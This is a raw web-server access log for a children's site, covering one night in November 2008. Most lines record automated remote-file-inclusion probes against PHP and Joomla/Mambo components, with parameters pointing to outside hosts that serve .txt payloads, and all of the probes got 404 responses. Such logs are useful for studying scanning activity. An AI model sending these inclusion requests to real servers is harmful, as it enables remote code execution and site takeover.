69.73.138.108 - - [19/Nov/2008:23:00:45 -0700] "GET /logs/errors.php?error=http://www.alt-sachsenhausen-ffm.de/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [19/Nov/2008:23:00:45 -0700] "GET /errors.php?error=http://www.alt-sachsenhausen-ffm.de/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [19/Nov/2008:23:00:45 -0700] "GET /logs/access_log.old/errors.php?error=http://www.alt-sachsenhausen-ffm.de/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
89.218.85.18 - - [19/Nov/2008:23:01:14 -0700] "GET /logs/access_log.old/errors.php?error=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [19/Nov/2008:23:01:49 -0700] "GET /errors.php?error=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [19/Nov/2008:23:01:49 -0700] "GET /logs/errors.php?error=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
69.73.138.108 - - [19/Nov/2008:23:03:29 -0700] "GET /errors.php?error=http://www.alt-sachsenhausen-ffm.de/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [19/Nov/2008:23:03:29 -0700] "GET /logs/errors.php?error=http://www.alt-sachsenhausen-ffm.de/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [19/Nov/2008:23:03:29 -0700] "GET /logs/access_log/errors.php?error=http://www.alt-sachsenhausen-ffm.de/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
203.231.35.38 - - [19/Nov/2008:23:05:08 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [19/Nov/2008:23:05:08 -0700] "GET /logs/access_log.old//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [19/Nov/2008:23:05:11 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
218.239.45.181 - - [19/Nov/2008:23:05:28 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
218.239.45.181 - - [19/Nov/2008:23:05:28 -0700] "GET /logs/access_log.old//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
218.239.45.181 - - [19/Nov/2008:23:05:30 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
140.130.101.5 - - [19/Nov/2008:23:06:34 -0700] "GET /logs/access_log.old//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
218.239.45.181 - - [19/Nov/2008:23:06:42 -0700] "GET /logs/access_log.old//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
218.239.45.181 - - [19/Nov/2008:23:06:42 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
218.239.45.181 - - [19/Nov/2008:23:06:42 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
218.234.23.56 - - [19/Nov/2008:23:07:15 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
218.234.23.56 - - [19/Nov/2008:23:07:15 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
218.234.23.56 - - [19/Nov/2008:23:07:15 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
140.130.101.5 - - [19/Nov/2008:23:07:33 -0700] "GET /logs/access_log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hondooo.de//components/com_extcalendar/lib/data/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
174.133.70.138 - - [19/Nov/2008:23:08:31 -0700] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
87.106.245.44 - - [19/Nov/2008:23:09:25 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [19/Nov/2008:23:09:25 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
117.103.14.5 - - [19/Nov/2008:23:09:26 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.deporte6am.com/imager/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
117.103.14.5 - - [19/Nov/2008:23:09:26 -0700] "GET /logs/access_log.old/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.deporte6am.com/imager/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
117.103.14.5 - - [19/Nov/2008:23:09:26 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.deporte6am.com/imager/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
203.231.35.38 - - [19/Nov/2008:23:09:48 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [19/Nov/2008:23:09:49 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [19/Nov/2008:23:09:49 -0700] "GET /logs/error_log.old//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
222.236.47.182 - - [19/Nov/2008:23:10:05 -0700] "GET //styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:10:05 -0700] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:10:05 -0700] "GET /logs/access_log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:10:06 -0700] "GET /logs/access_log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:10:06 -0700] "GET //styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:10:06 -0700] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:10:08 -0700] "GET //styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:10:08 -0700] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:10:08 -0700] "GET /logs/access_log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
89.218.85.18 - - [19/Nov/2008:23:10:13 -0700] "GET /logs/access_log/errors.php?error=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [19/Nov/2008:23:10:13 -0700] "GET /errors.php?error=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [19/Nov/2008:23:10:13 -0700] "GET /logs/errors.php?error=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [19/Nov/2008:23:11:25 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [19/Nov/2008:23:11:25 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
64.254.233.2 - - [19/Nov/2008:23:12:23 -0700] "GET /logs/error_log.old/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
64.254.233.2 - - [19/Nov/2008:23:12:23 -0700] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
64.254.233.2 - - [19/Nov/2008:23:12:23 -0700] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
117.103.14.5 - - [19/Nov/2008:23:12:51 -0700] "GET /logs/access_log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.deporte6am.com/imager/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
222.236.47.182 - - [19/Nov/2008:23:16:44 -0700] "GET /logs/access_log//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:16:52 -0700] "GET /logs/access_log//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:16:58 -0700] "GET /logs/access_log//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
205.188.116.67 - - [19/Nov/2008:23:17:52 -0700] "HEAD /oldcalendars/calendarmar06.htm HTTP/1.1" 200 0 www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322)" "-"
205.188.116.16 - - [19/Nov/2008:23:17:52 -0700] "HEAD /oldcalendars/calendarjan06.htm HTTP/1.1" 200 0 www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322)" "-"
72.30.79.97 - - [19/Nov/2008:23:21:08 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.79.97 - - [19/Nov/2008:23:21:08 -0700] "GET /ads/popupads/PRWAsheville.htm HTTP/1.0" 200 3968 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
174.133.70.138 - - [19/Nov/2008:23:23:08 -0700] "GET /logs/access_log.old/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
174.133.70.138 - - [19/Nov/2008:23:23:08 -0700] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
174.133.70.138 - - [19/Nov/2008:23:23:08 -0700] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
174.133.70.138 - - [19/Nov/2008:23:23:36 -0700] "GET /logs/access_log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
174.133.70.138 - - [19/Nov/2008:23:26:40 -0700] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
174.133.70.138 - - [19/Nov/2008:23:26:40 -0700] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
222.236.47.182 - - [19/Nov/2008:23:32:11 -0700] "GET /logs/access_log.old//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:33:09 -0700] "GET /logs/access_log.old//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [19/Nov/2008:23:33:41 -0700] "GET /logs/access_log.old//styles/internal/header.php?tpl_pgb_moddir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
38.99.44.103 - - [19/Nov/2008:23:38:22 -0700] "GET /pediatricians.htm HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
72.30.142.83 - - [19/Nov/2008:23:41:11 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.142.83 - - [19/Nov/2008:23:41:11 -0700] "GET /images/animalsinsects/?N=D HTTP/1.0" 200 976 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
216.240.136.125 - - [19/Nov/2008:23:41:48 -0700] "GET /outdoorexcursions.htm HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible ; MSIE 6.0; Windows NT 5.1)" "-"
206.225.91.21 - - [19/Nov/2008:23:43:36 -0700] "GET /logs/access_log.old///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [19/Nov/2008:23:43:36 -0700] "GET ///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [19/Nov/2008:23:43:36 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [19/Nov/2008:23:43:56 -0700] "GET ///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [19/Nov/2008:23:43:57 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [19/Nov/2008:23:43:57 -0700] "GET /logs/access_log.old%20%20///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
218.234.23.56 - - [19/Nov/2008:23:44:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
218.234.23.56 - - [19/Nov/2008:23:44:43 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
206.225.91.21 - - [19/Nov/2008:23:44:44 -0700] "GET /logs/access_log///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [19/Nov/2008:23:46:05 -0700] "GET /logs/access_log%20%20///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
218.234.23.56 - - [19/Nov/2008:23:47:23 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
218.234.23.56 - - [19/Nov/2008:23:47:23 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
206.225.91.21 - - [19/Nov/2008:23:47:34 -0700] "GET ///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [19/Nov/2008:23:47:34 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [19/Nov/2008:23:47:34 -0700] "GET /logs/access_log.old///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
91.121.162.129 - - [19/Nov/2008:23:47:54 -0700] "GET /logs/access_log.old//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:47:54 -0700] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:47:54 -0700] "GET /logs/access_log.old//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:47:54 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:47:55 -0700] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:47:55 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:48:08 -0700] "GET /logs/access_log.old//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:48:09 -0700] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:48:09 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:48:53 -0700] "GET /logs/access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:48:55 -0700] "GET /logs/access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
206.225.91.21 - - [19/Nov/2008:23:49:01 -0700] "GET /logs/access_log///vwar/backup/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
218.234.23.56 - - [19/Nov/2008:23:49:02 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
218.234.23.56 - - [19/Nov/2008:23:49:03 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
91.121.162.129 - - [19/Nov/2008:23:49:10 -0700] "GET /logs/access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
69.73.133.74 - - [19/Nov/2008:23:53:50 -0700] "GET /logs/access_log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "-"
69.73.133.74 - - [19/Nov/2008:23:53:50 -0700] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "-"
69.73.133.74 - - [19/Nov/2008:23:53:50 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "-"
65.55.210.222 - - [19/Nov/2008:23:55:11 -0700] "GET /robots.txt HTTP/1.1" 404 - www.wnckids.com "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "-"
65.55.210.222 - - [19/Nov/2008:23:56:02 -0700] "GET /logs/access_log.old HTTP/1.1" 200 1011484 www.wnckids.com "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "-"
64.34.166.205 - - [19/Nov/2008:23:56:08 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "-"
64.34.166.205 - - [19/Nov/2008:23:56:08 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "-"
81.122.81.86 - - [20/Nov/2008:00:02:16 -0700] "GET /logs/access_log.old/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.76" "-"
81.122.81.86 - - [20/Nov/2008:00:02:16 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.76" "-"
81.122.81.86 - - [20/Nov/2008:00:02:21 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.76" "-"
94.23.10.29 - - [20/Nov/2008:00:03:41 -0700] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:00:03:41 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:00:03:41 -0700] "GET //include/admin.lib.inc.php?site_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
